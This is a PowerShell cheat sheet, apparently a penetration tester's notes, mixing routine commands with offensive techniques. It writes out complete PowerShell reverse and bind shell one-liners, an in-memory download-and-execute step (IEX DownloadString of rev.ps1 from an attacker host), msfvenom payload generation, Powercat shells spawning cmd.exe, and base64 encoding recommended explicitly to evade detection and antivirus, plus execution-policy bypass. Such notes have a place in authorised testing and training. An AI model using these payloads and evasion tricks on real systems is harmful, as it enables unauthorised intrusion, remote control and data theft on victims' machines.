Powershell Cheat Sheet

Cheat sheet and tricks for the Powershell programming language.

NOTE: The Windows PowerShell Integrated Scripting Environment (ISE) is no longer in active development. Use Visual Studio Code with the PowerShell Extension instead.

Kali Linux
Execution Policy
Encoding
File Transfer
Bind Shell
Reverse Shell
Examples
Powercat

See also PowerShell Empire, PowerView.

PowerShell under Kali Linux

Already installed in Kali Linux.

pwsh

Update Help commands

Update-Help

Test

Get-Process -Name sshd*

Set Execution Policy

Before running Powershell script, the right policy must be applied. Open a CMD window as an administrator (Run as administrator).

powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

Remove all restrictions

powershell Set-ExecutionPolicy Unrestricted

Remove all restriction for current user

powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Show policies

powershell Get-ExecutionPolicy -List

Encoding

TIP: Encode commands to evade detection. See Pulling Back the Curtains on EncodedCommand PowerShell Attacks

Encode a command in base64

IMPORTANT: Command needs to be encoded as UTF-16-LE, then converted to Base64.

Using CyberChef, create recipe Encode text, choose UTF16LE (1200), then To base64.

On Unix:

printf 'dir c:\\' | iconv -t UTF-16LE | base64

Using Powershell:

powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('dir c:\\'))

Execute a command encoded in base 64

powershell -ENC ZABpAHIAIABjADoAXABcAA==

File Transfer

Download using HTTP

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/file.txt','C:\Users\' + $Env:USERNAME + '\Desktop\file.txt')"

Download using HTTPS source

powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
(new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt','C:\Users\' + $Env:USERNAME + '\Desktop\quebec.txt')

Bind Shell

Client -> Bind shell -> Server

To validate, NOT TESTED

Server mode (victim, Windows)

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Client mode (Kali)

nc -nv <WINDOWS IP> 443

Reverse Shell

Send a command shell to a host listening on a port.

Msfvenom

msfvenom -l payloads | grep -i powershell
cmd/windows/powershell_bind_tcp                     Interacts with a powershell session on an established socket connection
cmd/windows/powershell_reverse_tcp                  Interacts with a powershell session on an established socket connection
cmd/windows/reverse_powershell                      Connect back and create a command shell via Powershell
windows/powershell_bind_tcp                         Listen for a connection and spawn an interactive powershell session
windows/powershell_reverse_tcp                      Listen for a connection and spawn an interactive powershell session
windows/x64/powershell_bind_tcp                     Listen for a connection and spawn an interactive powershell session
windows/x64/powershell_reverse_tcp                  Listen for a connection and spawn an interactive powershell session

To validate, NOT TESTED

# To validate...
msfvenom -p windows/powershell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > windows_shell.exe
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT > shell.bat
msfconsole
use multi/handler
set payload cmd/windows/reverse_powershell 
set lhost X.X.X.X
set lport 443
run

On Kali (listener)

sudo nc -lnvp 443

On Windows (victim)

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<KALI IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Rev shell – In memory

Working 🙂 The victim will download payload and execute in memory.

Kali

rev.ps1

$client = New-Object System.Net.Sockets.TCPClient('<KALI IP>',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Distribute rev.ps1

python3 -m http.server 80

Victim (Windows)

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<KALI IP>/rev.ps1')

Examples

Powershell version

powershell $PSversionTable

Examples

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enter-pssession?view=powershell-7.2

powershell
Enter-PSSession -ComputerName Server01
# Display file content
powershell Get-Content /home/file1.txt

# Display content "live"
powershell get-content /home/file1.txt -tail 5 -wait

# List command history
powershell Get-History

# Display environment variables
Set-Location Env:
Get-ChildItem

# Display a specific environment variable
Get-ChildItem Env:Computername

# Escaping Powershell Restricted Environment
Type !

# Check execution policy for scripts (Restricted or Bypass)
Get-ExecutionPolicy

# Bypass execution policy for scripts
powershell -ep bypass

# Import a script
Import-Module .\get-indexeditem.ps1

# Search files with Windows Search Index (enabled by default)
Get-IndexedItem -Filter ""

# Kill a process by name
Stop-Process -Name "ProcessName" -Force

# Kill a process by PID
Stop-Process -ID PID -Force

# Test network connection
powershell Test-NetConnection proxy.example.com -Port 8080

Loop on results

$list=Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

foreach ($item in $list) {
    write-host ("{0} {1}" -f $item.Name, $item.NameLength)
}

Powercat

Powershell version of Netcat.

Download

Distribute Powercat from Kali

sudo cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 /var/www/html
sudo service apache2 start

On Windows

See File Transfer for more options.

bitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/powercat.ps1 C:\Users\%USERNAME%\Desktop\powercat.ps1 & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB

Usage examples

Change the execution policy as unrestricted.

Load Powercat

IMPORTANT: Some antivirus can block Powercat.

powershell
. C:\Users\someuser\Desktop\powercat.ps1

Help

powercat -h

File transfer

Send file from Windows using Powercat

powercat -c <KALI IP> -p 443 -i C:\Users\someuser\Desktop\powercat.ps1

Receive file on Kali

sudo nc -lnvp 443 > powercat.ps1
[Ctrl+C]

Reverse shell

Server mode (Kali)

sudo nc -lnvp 443

Client mode (Windows sends reverse shell)

powercat -c <KALI IP> -p 443 -e cmd.exe

Client mode (Windows using Stand-Alone base64 encoded payload)

NOTE: Without encoding, the payload will be detected by antivirus.

powercat -c <KALI IP> -p 443 -e cmd.exe -ge > revshell.ps1
powershell.exe -E <generated base64 payload>

Bind shell

On Windows

powercat -l -p 443 -e cmd.exe

On Windows – Stand-Alone base64 encoded payload

powercat -l -p 443 -e cmd.exe -ge > bindshell.ps1
powershell.exe -E <generated base64 payload>

On Kali

nc <WINDOWS IP> 443